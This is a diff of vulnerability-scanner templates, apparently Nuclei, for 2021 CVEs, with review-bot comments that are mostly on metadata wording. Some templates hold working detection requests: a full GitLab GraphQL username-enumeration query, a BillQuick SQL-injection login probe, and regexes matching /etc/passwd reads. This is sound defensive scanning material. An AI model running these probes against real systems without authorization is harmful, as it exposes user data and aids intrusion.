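Review bot: The duplicated 'for the for MinIO Operator' survives in the rewritten description. In the new `remediation:` text, 'by unset the ... environment variable' should be 'by unsetting the ... environment variables', and 'v.0.12.3' should match the 'v0.12.2' style used earlier or drop the prefix.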

View File

@ -4,7 +4,8 @@ info:
name: Metabase Local File Inclusion
author: 0x_Akoko
severity: critical
description: Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you&#8217;re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
description: "Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded."
remediation: "This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application."
reference:
- https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
- https://nvd.nist.gov/vuln/detail/CVE-2021-41277
@ -33,4 +34,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/03/06
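Review bot: The remediation has a typo in the version list: 'fixed in 0.40.5 and .40.5' should be '0.40.5 and 1.40.5', as in the description line it replaced. The rewritten description also says 'a local file inclusion security issue ... and potential local file inclusion', so the phrase appears twice; one occurrence can go.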

View File

@ -4,8 +4,9 @@ info:
name: ECOA Building Automation System - Directory Traversal Content Disclosure
author: gy741
severity: high
description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41291
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
- https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
tags: cve,cve2021,ecoa,lfi,traversal
@ -25,3 +26,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/03/06
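Review bot: The new description line still lacks a terminal period ('... on the affected device'); the other descriptions in this change end with one.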

View File

@ -1,11 +1,12 @@
id: CVE-2021-41293
info:
name: ECOA Building Automation System - LFD
name: ECOA Building Automation System - Local File Disclosure
author: 0x_Akoko
severity: high
description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi,disclosure
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

View File

@ -1,12 +1,13 @@
id: CVE-2021-41349
info:
name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
@ -39,4 +40,6 @@ requests:
- type: status
status:
- 500
- 500
# Enhanced by mp on 2022/03/07
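Review bot: 'is vulnerable to a spoofing vulnerability' is redundant; suggest 'contains a spoofing vulnerability'. The name now says 'Reflected Cross-Site Scripting' while the description only says spoofing; a short clause noting that the spoofing classification covers this reflected XSS would help readers reconcile the two.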

View File

@ -4,7 +4,7 @@ info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@ -28,3 +28,5 @@ requests:
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
# Enhanced by mp on 2022/03/07

View File

@ -1,13 +1,13 @@
id: CVE-2021-41467
info:
name: JustWriting - Reflected XSS
name: JustWriting - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
reference:
- https://github.com/hjue/JustWriting/issues/106
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -36,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/03/07
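Review bot: Subject-verb agreement in the new description: 'A cross-site scripting vulnerability ... allow remote attackers' should be 'allows'.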

View File

@ -1,11 +1,14 @@
id: CVE-2021-41648
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
name: PuneethReddyHC action.php SQL Injection
author: daffainfo
severity: high
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41648
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41648
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -38,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07
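Review bot: The new NVD reference points at the wrong CVE: `https://nvd.nist.gov/vuln/detail/CVE-2021-41649` inside the CVE-2021-41648 template should be `.../CVE-2021-41648`. The name was also shortened to 'PuneethReddyHC action.php SQL Injection', dropping the product, whereas the sibling CVE-2021-41649 template keeps 'Online Shopping System'; align the two. 'Using a post request does not sanitize the user input' is awkward; 'the prId parameter in POST requests is not sanitized' reads better.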

View File

@ -1,11 +1,14 @@
id: CVE-2021-41649
info:
name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
author: daffainfo
severity: critical
description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference: https://github.com/MobiusBinary/CVE-2021-41649
description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
reference:
- https://github.com/MobiusBinary/CVE-2021-41649
- https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
- https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@ -37,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/03/07

View File

@ -2,12 +2,14 @@ id: CVE-2021-41653
info:
name: TP-Link - OS Command Injection
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a crafted payload in an IP address input field.
description: The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.
author: gy741
severity: critical
remediation: Upgrade the firmware to at least version "TL-WR840N(EU)_V5_211109".
reference:
- https://k4m1ll0.com/cve-2021-41653.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-41653
- https://www.tp-link.com/us/press/security-advisory/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
@ -43,6 +45,8 @@ requests:
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/02/27

View File

@ -4,10 +4,12 @@ info:
name: Apache 2.4.49 - Path Traversal and Remote Code Execution
author: daffainfo
severity: high
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.
remediation: Update to Apache HTTP Server 2.4.50 or later.
reference:
- https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
- https://nvd.nist.gov/vuln/detail/CVE-2021-41773
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
- https://twitter.com/ptswarm/status/1445376079548624899
- https://twitter.com/h4x0r_dz/status/1445401960371429381
- https://github.com/blasty/CVE-2021-41773
@ -45,3 +47,5 @@ requests:
name: RCE
words:
- "CVE-2021-41773-POC"
# Enhanced by mp on 2022/02/27

View File

@ -4,7 +4,7 @@ info:
name: PlaceOS 1.2109.1 - Open Redirection
author: geeknik
severity: medium
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect
description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
reference:
- https://github.com/PlaceOS/auth/issues/36
- https://www.exploit-db.com/exploits/50359
@ -34,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
# Enhanced by mp on 2022/02/27
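Review bot: Version inconsistency between `name: PlaceOS 1.2109.1 - Open Redirection` and the description's 'before 1.29.10.0'; one of them is wrong and should be reconciled against the referenced advisory while this description is being edited.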

View File

@ -1,11 +1,12 @@
id: CVE-2021-41878
info:
name: i-Panel Administration System - Reflected XSS
name: i-Panel Administration System - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: A reflected cross-site scripting (XSS) vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
description: A reflected cross-site scripting vulnerability exists in the i-Panel Administration System Version 2.0 that enables a remote attacker to execute arbitrary JavaScript code in the browser-based web console.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-41878
- https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41878
classification:
@ -35,3 +36,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/02/27

View File

@ -0,0 +1,52 @@
id: CVE-2021-4191
info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2021-4191
cwe-id: CWE-359
tags: cve,cve2021,gitlab,api,graphql,enum,unauth
requests:
- raw:
- |
POST /api/graphql HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Accept: */*
Origin: {{RootURL}}
Referer: {{RootURL}}/-/graphql-explorer
{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n# {\n# field(arg: \"value\") {\n# subField\n# }\n# }\n#\n# Keyboard shortcuts:\n#\n# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\n#\n# Run Query: Ctrl-Enter (or press the play button above)\n#\n# Auto Complete: Ctrl-Space (or just start typing)\n#\n\n{\n users {\n nodes {\n id\n name\n username\n }\n }\n}","variables":null,"operationName":null}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"data"'
- '"users"'
- '"nodes"'
- '"id"'
- 'gid://'
condition: and
- type: status
status:
- 200
extractors:
- type: json
json:
- '.data.users.nodes[].username'
# Enhanced by mp on 2022/03/07
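Review bot: `cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` is not a valid vector string; the prefix has to name the CVSS version, so it should read `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (the 5.3 score is already carried by `cvss-score`). The MITRE reference also drops the `CVE-` prefix (`name=2021-4191`), unlike every other template in this diff. In the raw request, as shown here, there is no blank line between the `Referer` header and the JSON body, so the body would go out as a malformed header rather than as the request body; add the separator, and consider trimming the query to `{ users { nodes { id name username } } }` instead of shipping the whole GraphiQL welcome comment in every request.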

View File

@ -1,9 +1,9 @@
id: CVE-2021-41951
info:
name: Resourcespace - Reflected XSS
name: Resourcespace - Reflected Cross-Site Scripting
author: coldfish
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected Cross-Site Scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
description: ResourceSpace before 9.6 rev 18290 is affected by a reflected cross-site scripting vulnerability in plugins/wordpress_sso/pages/index.php via the wordpress_user parameter.
severity: medium
tags: cve,cve2021,xss,resourcespace
reference:
@ -33,4 +33,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/27

View File

@ -4,8 +4,10 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://twitter.com/itsecurityco/status/1446136957117943815
@ -44,3 +46,5 @@ requests:
name: RCE
words:
- "CVE-2021-42013"
# Enhanced by mp on 2022/02/27

View File

@ -1,17 +1,11 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
name: BillQuick Web Suite SQL Injection
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
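Review bot: the flattened description drops two facts the multi-line version carried that are useful for triage: that the flaw was exploited in the wild in October 2021 for ransomware installation, and that the injection point is the `txtID` (username) parameter, which is exactly what the request in the next hunk targets (`txtID=uname%27`). Suggest keeping at least the parameter, e.g. "allows SQL injection via the txtID (username) parameter for unauthenticated remote code execution", rather than losing it to the one-line rewrite.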
@ -34,7 +28,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
@ -67,3 +61,5 @@ requests:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
# Enhanced by mp on 2022/02/27

View File

@ -1,13 +1,13 @@
id: CVE-2021-42551
info:
name: NetBiblio WebOPAC - Reflected XSS
name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
author: compr00t
severity: medium
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected Cross-Site Scripting vulnerability in its Wikipedia modul through /NetBiblio/search/shortview via the searchTerm parameter.
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
- https://www.cve.org/CVERecord?id=CVE-2021-42551
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
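Review bot: `cvss-score: 6.10` should be `6.1`; CVSS base scores are reported to one decimal place and the trailing zero reads like a different value. Minor, but worth fixing while the file is being touched (the new Cassandra template below has the same `9.10` pattern).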
@ -45,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/27

View File

@ -2,11 +2,11 @@ id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://nvd.nist.gov/vuln/detail/CVE-2021-42565
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
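Review bot: the MITRE reference in this CVE-2021-42565 template points at the neighbouring CVE (`cvename.cgi?name=2021-42566`) and also lacks the `CVE-` prefix; it should be `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42565`. The missing prefix is repeated in the CVE-2021-42566 template further down.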
@ -37,3 +37,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/27

View File

@ -1,11 +1,12 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
@ -37,3 +38,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-42567
info:
name: Apereo CAS Reflected XSS
name: Apereo CAS Reflected Cross-Site Scripting
author: pdteam
severity: medium
description: Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
reference:
- https://apereo.github.io/2021/10/18/restvuln/
- https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 401
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-43062
info:
name: Fortinet Fortimail 7.0.1 - Reflected XSS
name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
author: ajaysenr
severity: medium
description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43062
- https://www.fortiguard.com/psirt/FG-IR-21-185
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -4,6 +4,8 @@ info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
remediation: Upgrade to version v21.3.0. or later.
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
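Review bot: `remediation: Upgrade to version v21.3.0. or later.` has a stray period after the version number; it should read `Upgrade to version 21.3.0 or later.` (no other remediation line in this diff carries a `v` prefix either).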
@ -11,6 +13,8 @@ info:
tags: cve,cve2021,go,lfi,gocd,takeover
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
classification:
cve-id: CVE-2021-43287
requests:
- method: GET
@ -26,3 +30,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,10 @@
id: CVE-2021-43495
info:
name: AlquistManager lfi
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
@ -25,3 +25,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/28

View File

@ -1,7 +1,7 @@
id: CVE-2021-43496
info:
name: Clustering LFI
name: Clustering Local File Inclusion
author: Evan Rubinstein
severity: high
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
@ -25,3 +25,5 @@ requests:
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

View File

@ -1,10 +1,11 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
author: cckuailong
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
reference:
- https://github.com/AK-blank/CVE-2021-43778
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
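Review bot: the renamed title `GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.` keeps a trailing period that no other `name:` field in this diff has; drop it. The wording `GLPI instances version 2.x prior to version 2.6.1` also reads as if 2.x were GLPI's own version, whereas the range is the Barcode plugin's; `GLPI instances with Barcode plugin versions 2.x prior to 2.6.1 installed` would be clearer.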
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
# Enhanced by mp on 2022/02/28

View File

@ -4,8 +4,8 @@ info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana is an open-source analytics and monitoring application. Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
@ -34,4 +34,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/18
# Enhanced by mp on 2022/02/28
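Review bot: replacing `# Enhanced by cs on 2022/02/18` with `# Enhanced by mp on 2022/02/28` erases the earlier attribution. If these comments are meant as a change record, append a line rather than overwrite the previous one; otherwise they add nothing the git log does not already give.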

View File

@ -1,10 +1,11 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
name: Admidio - Reflected Cross-Site Scripting
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
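Review bot: `an attacker is capable to execute malicious scripts` is ungrammatical; use `an attacker is able to execute arbitrary scripts` (or `capable of executing`). Shortening the description is fine now that the patched version is carried by the new `remediation` line.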
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

View File

@ -1,11 +1,14 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
